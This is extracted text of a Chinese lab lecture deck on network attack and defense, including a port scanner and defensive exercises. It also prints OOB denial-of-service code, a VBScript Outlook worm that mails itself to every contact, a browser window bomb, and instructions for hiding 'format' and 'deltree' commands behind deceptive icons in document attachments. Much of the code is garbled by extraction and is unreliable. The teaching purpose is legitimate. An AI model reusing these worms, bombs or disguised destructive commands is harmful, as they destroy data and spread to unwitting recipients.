网络攻击与防御实例ppt课件.ppt

上传人:小飞机 文档编号:3609713 上传时间:2023-03-14 格式:PPT 页数:46 大小:959KB
返回 下载 相关 举报
网络攻击与防御实例ppt课件.ppt_第1页
第1页 / 共46页
网络攻击与防御实例ppt课件.ppt_第2页
第2页 / 共46页
网络攻击与防御实例ppt课件.ppt_第3页
第3页 / 共46页
网络攻击与防御实例ppt课件.ppt_第4页
第4页 / 共46页
网络攻击与防御实例ppt课件.ppt_第5页
第5页 / 共46页
点击查看更多>>
资源描述

《网络攻击与防御实例ppt课件.ppt》由会员分享,可在线阅读,更多相关《网络攻击与防御实例ppt课件.ppt(46页珍藏版)》请在三一办公上搜索。

1、一、扫描器程序设计,要求具备网络攻防基本原理、C+编程技术、VBS脚本编程、基于TCP/IP的Win Scoket编程。这个扫描器相当简单,只需要有一定的C语言编程能力和Socket知识就可以完成。当然,这个简单的扫描器并不是真正意义上的端口扫描器,因为它给出的信息太少了,而且这种扫描会在目标机上留下大量的记录,有经验的管理员一看就知道自己正在受到攻击,而且可以马上追踪到扫描者。如果要进一步扫描出更多信息并隐蔽自己,需要用到许多复杂的扫描技术。,#include/包含windows套接字函数#includestdio.h#pragma comment(lib,ws2_32)/将注释wsock3

2、2放置到lib文件中#include#includevoid main()WSADATA ws;/将ws的数据类型声明为WSADATASOCKET s;struct sockaddr_in addr;/系统保存套接字地址的结构体int g1,k;long g2;printf(请输入要监测最大的端口号n);scanf(%d,/下面用connect与端口建立连接,如果可以连接表示端口开启,否则关闭for(int i=1;ik;i+)/循环1到k个端口g2=WSAStartup(0 x0101,/建立连接,判断端口是否关闭,if(g1!=0)printf(10.1.8.62:%i 端口关闭n,i);

3、/指定的端口关闭WSACleanup();else printf(10.1.8.*:%i 端口开启n,i);/指定的端口开放closesocket(s);/关闭套接字,二、OOB网络炸弹攻击编程,OOB(Out Of Band)是TCP/IP的一种传输模式,是早期Win95/NT的漏洞,攻击者向系统139端口传送0字节数据包时,Win系统自动恢复该数据碎片,导致系统资源耗尽,使机器出现蓝屏,以至死机。常见有:WinNuke、Voob等网络炸弹。,该程序是用Visual C+60语言设计的,使用Scoket套接字的通信形式,利用数据包频繁的发送,造成接受方系统瘫痪。#include#includ

4、e#include#pragma comment(lib,wsock32.lib)/*定义攻击目标计算机的IP地址*/char*IpAddr;int IpPort;/进攻端口135或137或139char*Msg=You are bombed!;/*在被攻击者计算机上显示You are bombed!字符串*/,void Banner(void)/*被段显示攻击者信息*/printf(Windows95 OOB Bomber by jiaocang);int main(int argc,char*argv)/*开始定义变量*/struct sockaddr_in sin;WSADATA wsa

5、Data;SOCKET sd;Banner();/*显示攻击者信息*/,printf(usage:OOB Ip Port 135);return 1;IpAddr=argv1;IpPort=atoi(argv2);/*初始化winsock*/if(WSAStartup(MAKEWORD(2,2),IpAddr=argv1;IpPort=atoi(argv2);/*初始化winsock*/If(WSAStartup(0 x0101,if(wsaData.wVersion!=0 x0101)printf(Winsock version is incorrect);/*版本有错误,无法通信*/WSA

6、Cleanup();/函数WSACleanup()关闭Socket套接字/return 1;if(sd=socket(AF_INET,SOCK_STREAM,IPPROTO_IP)=INVALID_SOCKET)printf(Create socket error!);return 1;/*连接到被攻击者的IP地址#/,printf(connecte to 127.0.0.0:139);/*发送攻击字符*/if(send(sd,Msg,strlen(Msg),MSG_OOB)=SOCKET_ERROR)printf(send data error!);closesocket(sd);WSACl

7、eanup();return 1;/*关闭连接,释放资源*/closesocket(sd);/WSACleanup();,/*提示printf(Bomb complete!);return 0;,三、木马设计原理,特洛伊木马(Trojan horse)是一种隐藏了具有攻击性的应用程序,与病毒程序不同,它不具备复制能力,其功能具有破坏性质。大部分木马采用C/S运行模式,当服务端在目标计算机上被运行后,打开一个特定的端口进行监听,当客户端向服务器发出连接请求时,服务器端的相应程序会自动运行,来应答客户机的请求。,源程序如下:,四、OutLook漏洞攻击程序设计,网络邮箱病毒是目前常见的攻击手段之一

8、,该编程要求学生具备以下几点基础:1VBS脚本语言、Javascript脚本语言、网页编程、Windows系统脚本语言。2 具备网络编程知识,Windows网络安全设置,网络传输构成,Windows注册表设置,请参照信息系统安全与对抗技术实验教程(罗森林、高平),OutLook攻击程序是由VBScript编写的,其自我复制的原理基本上是利用程序将本身的脚本内容复制一份到一个临时文件,然后再在传播的环节将其作为附件发送出去。我们看看脚本是怎么样完成这个功能的。Set so=CreateObject(Scripting.FileSystemObject)/是创建一个文件系统对象so.GetFile

9、(WScript.ScriptFullName).Copy(C:dateiname.vbs)/打开这个脚本文件,WScript.ScriptFullName指明是这个程序本身,是一个完整的路径文件名。GetFile函数获得这个文件,Copy函数将这个文件复制到c盘根目录下dateiname.vbs这个文件。,通过OutLook传播的电子邮件病毒都是向地址簿中存储的电子邮件地址发送内同相同的脚本附件完成的。Set objOA=Wscript.CreateObject(Outlook.Application)/创建一个OUTLOOK应用的对象 Set objMapi=objOA.GetNameSp

10、ace(MAPI)/取得MAPI名字空间 Fori=1to objMapi.AddressLists.Count/遍历地址簿 SetobjAddList=objMapi.AddressL is ts(i)For j=1 To objAddList.AddressEnt ries.Count,Set objMail=objOA.CreateItem(0)objMail.Recipients.Add(objAddList.AddressEntries(j)/取得邮件地址,收件人 objMail.Subject=你好!objMail.Body=这次给你的附件是我的新文档!objMail.Attach

11、ments.Add(“c:virus.vbs)/把自己作为附件扩散出去 objMail.Send/发送邮件 Next Next.,五、网络炸弹编程设计,打开outlook express:,进入发信编辑,例:网页炸弹,该程序保存在htm为后缀的文件中,放在邮件的附件中,当双击它时,出现无穷网页窗口,将系统资源耗尽。no 使用Java脚本function openwindow()for(i=0;i,例:网络炸弹,如果将电子邮件夹带在word文挡中,激活炸弹方法如下:建立一个新文件-执行”插入-对象”-插入”包”对象-确定,start.exe/m format a:/q/autotest/ufor

12、mat:格式化a:磁盘/q:快速格式化u:强制执行autotest:自动执行,例:txt炸弹(1)建立一个仅有简单字符的文本文件,任意取文件名,如在记事本建立一个空格文件。,(2)打开写字板文档,将该文件拖入写字板文档中。,也可以从写字板的“插入”“对象”,弹出”插入对象”的对话框中选择“从文件创建”然后在“浏览”按钮选择要插入的文件。,(3)调用对象包选中该插入的图标,单击右键,选择“对象包对象”-“编辑对象包”。,在“对象包”的对话栏中选择“编辑”-“命令行”可以输入以下命令。Format a:/q/autotest/ustart.exe/m format a:/q/autotest/u(

13、win98系统)deltree/y a:*.*c:*.*deltree/y c:windowssystem*.c,(4)修改外观单击“插入图标”-从中任选一个图标。这里要求选择一个具有欺骗性的图标,能够使用户上当而被攻击。比如:将下载音乐的图标加入信件文档中,当双击时则系统被破坏。,输入命令形式如下:,同时可以给包建立一个文件名,这样更有诱惑性,方法:“编辑”-“标签”-在对话框中输入所要更该的文件名。,然后将包拖放到桌面上,可以作为附件发出,或嵌入文档中。防治:在怀疑的包上单击右键,选“编辑”,即可看到输入的命令。,六、实验要求,实验目的:掌握有关网络攻击与防护的基本原理,请参照有关书籍。了

14、解常用网络攻击软件:扫描器、木马、密码破解器等。实验要求:利用脚本语言、C语言设计网络攻击程序:漏洞扫描器、木马、邮箱攻击程序等。,通过WIN系统,结合日志分析、入侵检测分析,利用防火墙技术和WIN安全审核工具,加固自己的网络与计算机系统。通过课堂实验指导,了解程序设计思想与基本方法,要求学生在课余查阅图书资料,根据实验范例,对实验内容举一反三,独立设计软件。,具体如下:,了解信息收集的原理和扫描器的概念,区别端口扫描器与漏洞扫描器,它们的应用场合及在攻防系统中的作用。掌握常见的扫描器软件使用方法,如:SATAN、CIS、SuperScan。要求学生在上机时根据自己使用的扫描器软件对实验室网络

15、系统进行漏洞扫描并分析扫描的参数与结果,将其分析报告详细地写出来,并解释其原因及解决的措施。对扫描的结果作出正确的分析,根据分析评估网络系统安全性,必要时关闭危险端口,合理配置计算机系统。根据的实例,通过编程要求学生掌握端口扫描器的设计方法。,了解常见的监听软件使用方法,要求学生在上机时根据自己使用的监听软件对系统进行被动攻击所得的参数与结果进行分析,并按照其分析结果用实验报告形式详细地写出来,要求使用网络刺客sniffit、snoop软件。,掌握突破TCP/IP过滤/防火墙进入内网的方法,掌握TCPSocket数据转发功能,会使用相关的攻击软件,如何连接对方服务器,写出其步骤。要求学生理解和

16、掌握如何突破防火墙进入对方系统方法,通过实验报告形式将其论述详细地写出来,具体要求:概述,攻击原理,使用软件,攻击效果(注意要遵守国家法律,不要破坏对方资源,仅进入系统即可),攻击过程流程图。入侵监测技术是防火墙技术合理而有效的补充,要求结合漏洞扫描器的使用,通过端口的监测,收集关键信息,查看系统日志,分析其信息,检查系统中是否有违反安全策略的行为和遭到袭击的迹象。,利用网络防火墙、端口安全设置、日志设置及入侵监测策略的技术,最有效地加固计算机系统,通过实验结合上述技术到达最佳效果,要求写出分析报告、具体设置与安全建议。除本书所介绍的Windows系统漏洞外,要求学生更深入一层地了解其它漏洞形

17、式,它们的危害是什么?请认真总结和归纳其漏洞类型、漏洞危害、漏洞攻击、漏洞防范。结合拒绝攻击实例分析,要求学生自学smurf攻击方法,独立设计一个具有ICMP响应的网络阻塞攻击程序。,独立设计一个简单的web攻击系统,要求具有欺骗形式和攻击效果。结合后门攻击实例,要求学生分析程序设计思想,独立设计一个具有开启某端口功能和密码的后门程序。独立设计木马程序,结合SYN flood攻击实例中如何修改注册表加载自己的程序的方法和木马程序实例中隐藏任务栏的方法,要求具有自动加载、隐藏任务栏、能够控制系统的木马程序。,根据网络系统安全策略,要求学生结合漏洞扫描器的使用,通过端口的监测,收集关键信息,查看系

18、统日志,分析其信息,检查系统中是否有违反安全策略的行为和遭到袭击的迹象。利用网络防火墙、端口安全设置、日志设置及入侵监测策略的技术,最有效地加固计算机系统,同时结合Windows系统设置、Internet explore安全设置、Outlook Express的安全优化设计等方法。通过实验结合上述技术到达到网络体系安全防护的最佳效果,要求写出分析报告、具体设置与安全建议。,七、实验报告要求,1、实验题目。2、实验设备、实验环境的情况。3、实验目的。4、实验基本原理。5、实验方法概述。6、实验主体:实验程序清单,实验框图与流程图,实验途径,实验分析,实验结果。7、实验作业:实验总结报告(纸型B5)、实验报告的电子版(内容见实验报告要求1-3)及程序,1开放实验报告版型,选修实验的不要求2选修实验报告格式3实验报告格式一4实验报告格式二,八、参考资料,信息安全与对抗技术实验教程罗森林、高平编著,由北京理工大学出版发行http:/中国程序员网http:/VC+专业网站http:/网络安全论坛http:/hacker-黑客防线http:/http:/红客,谢谢同学们!答疑G,

展开阅读全文
相关资源
猜你喜欢
相关搜索

当前位置:首页 > 生活休闲 > 在线阅读


备案号:宁ICP备20000045号-2

经营许可证:宁B2-20210002

宁公网安备 64010402000987号